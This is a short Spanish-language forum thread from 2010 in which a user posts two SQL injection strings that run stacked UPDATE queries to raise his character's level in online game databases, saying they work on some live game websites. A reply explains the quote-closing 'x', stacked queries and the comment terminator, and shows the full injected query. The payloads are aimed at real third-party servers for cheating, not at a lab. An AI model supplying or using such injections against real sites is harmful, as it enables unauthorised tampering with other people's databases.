Pregunta Mssql inject.

Iniciado por PHAMTOM, 7 Mayo 2010, 02:39 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

PHAMTOM

7 Mayo 2010, 02:39 AM
Buenas,estaba revisando unas inyecciones sql para un juego ..

y e encontrado 2 tipos de inyecciones,en algunas webs funciona una y en otras funciona otra.

las 2 inyecciones son las siguientes :


' update character set clevel=400 where name = 'PHAMTOM'        //Esta inyeccion me edita el nivel.
'x'; update character set clevel=400 where name = 'PHAMTOM'     // esta inyeccion me edita el nivel.

yo sé que el " ; " sirve para terminar una sentencia , y poder empezar la otra pero no le veo explicación al  " 'x' "

saludos.PHAMTOM
Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más

WHK

#1
8 Mayo 2010, 02:49 AM
el ; no funciona en todas las webs porque el driver de musql por defecto en php no la reconoce como parte de una sentencia, en php+mysql el ; no existe.

para entender el X debes saber lenguaje sql.

Citarselect * from usuarios where name='$nombre'

Citarselect * from usuarios where name='x'; update character set clevel=400 where name = 'PHAMTOM' -- '
Imprimir
Ir Arriba Páginas1
Acciones del Usuario